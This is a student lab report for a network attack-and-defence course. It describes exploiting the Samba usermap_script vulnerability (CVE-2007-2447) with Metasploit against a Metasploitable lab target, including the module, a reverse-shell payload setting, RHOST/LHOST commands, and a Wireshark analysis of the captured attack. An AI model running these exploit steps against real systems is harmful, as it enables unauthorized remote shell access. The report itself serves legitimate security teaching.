20241909 2024-2025-2 《网络攻防实践》实践七报告
20241909 2024-2025-2 《网络攻防实践》实践七报告
1.实验内容
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.知识点梳理与总结
(1)SMB协议是什么?
SMB(Server Message Block)协议是实现不同类型计算机之间文件和打印机共享服务的协议。
SMB的工作原理就是让NetBIOS协议与SMB协议运行在TCP/IP协议之上,并且利用NetBIOS的名字解析功能让Linux计算机可以在Windows计算机之间相互访问共享文件和打印机的功能。
(2)Samba是什么服务?
Samba是在Linux和UNIX系统上实现SMB (Server Messages Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。
(3).username_script 是什么?
- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
- 影响Samba的3.0.20到3.0.25rc3 版本
- 当使用非默认的用户名映射脚本配置选项时产生
- 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令
3.实验过程
3.1 使用Metasploit进行Linux远程渗透攻击
实验环境
| 攻击机Kali IP地址 | 靶机 metasploit ip地址 |
|---|---|
| 192.168.200.3 | 192.168.200.123 |
与上次实验相同在kali终端输入msfconsole

查找要使用的漏洞对应的模块
输入search samba得到下图找到漏洞编号为15

使用use 13使用该模块

输入命令show payloads查看可用载荷

选择攻击负载,步骤与上一个实验几乎雷同
- 选择攻击载荷 setpayload cmd/unix/reverse
- 查看需要配置的参数 show options
- 配置相应的参数 set RHOST 192.168.200.123,set LHOST 192.168.200.3
- 攻击: exploit
![在这里插入图片描述]()
![在这里插入图片描述]()
![在这里插入图片描述]()
得到如下结果,发现查询IP已经改成了靶机的ip
![在这里插入图片描述]()
3.2 攻防对抗实践
实验环境与实验步骤基本相同,开启wireshark抓包,进入Metasploit,输入指令search usermap搜索漏洞-->使用指令use exploit/multi/samba/usermap_script来进行对应脚本的攻击-->set PAYLOAD cmd/unix/reverse来设置有效的攻击载荷-->设置攻击机ip地址和靶机ip地址-->输入exploit开始执行攻击,这里不再赘述与截图,只进行攻击后的分析。

攻击成功后输入指令shell和id查看shell权限账户及其所在的权限组,输入指令whoami查看当前权限账
户:

下来对攻击过程中的数据包进行分析,打开wireshark进行分析,可以看到我们的攻击类型为SMB 观察可知 攻击者IP为222.28.136.219,目标IP为222.28.136.165,目标端口为139。139 端口是为“NetBIOS Session Service” 提供的, 主要用于提供Windows 文件和打印机共享以及 Unix 中的 Samba 服务。Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。在这里的攻击利用了Samba服务的漏洞:

首先是攻击机向靶机发送一个SMB的Negotiate Protocol Request数据报,然后靶机响应一个SMB的Negotiate Protocol Response数据报。然后攻击机向靶机发起一个Session setup X request(会话设置请求)数据报,靶机确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。
追踪第一个SMB数据包的TCP流,可知攻击机利用4444端口与靶机建立telnet服务:

对一个TCP数据包分析可以得到ARP协议的询问开始时间即攻击发起的时间,为2025年4月2日23.01

在wireshark追踪对应的TCP流可以看见运行攻击指令之后输入的指令:

4.实验中遇到的问题及解决
本次实验与上次实验步骤相似并无大问题,只是分析到达时间时发现并不能对上我的攻击时间,经查询后发现是美国时间。
5.学习感悟与思考
这次实验虽然与上次的实验所使用的工具和命令大体相似,但是依旧十分有趣,加深了我对MSF模块的使用,因为本次使用了几个不同的漏洞,对于特定漏洞的利用也掌握的比较熟练了。对于tcp报文的分析与查找也更加的熟练、
6.参考资料
- 渗透测试实例
- 《网络攻防技术与实现》




浙公网安备 33010602011771号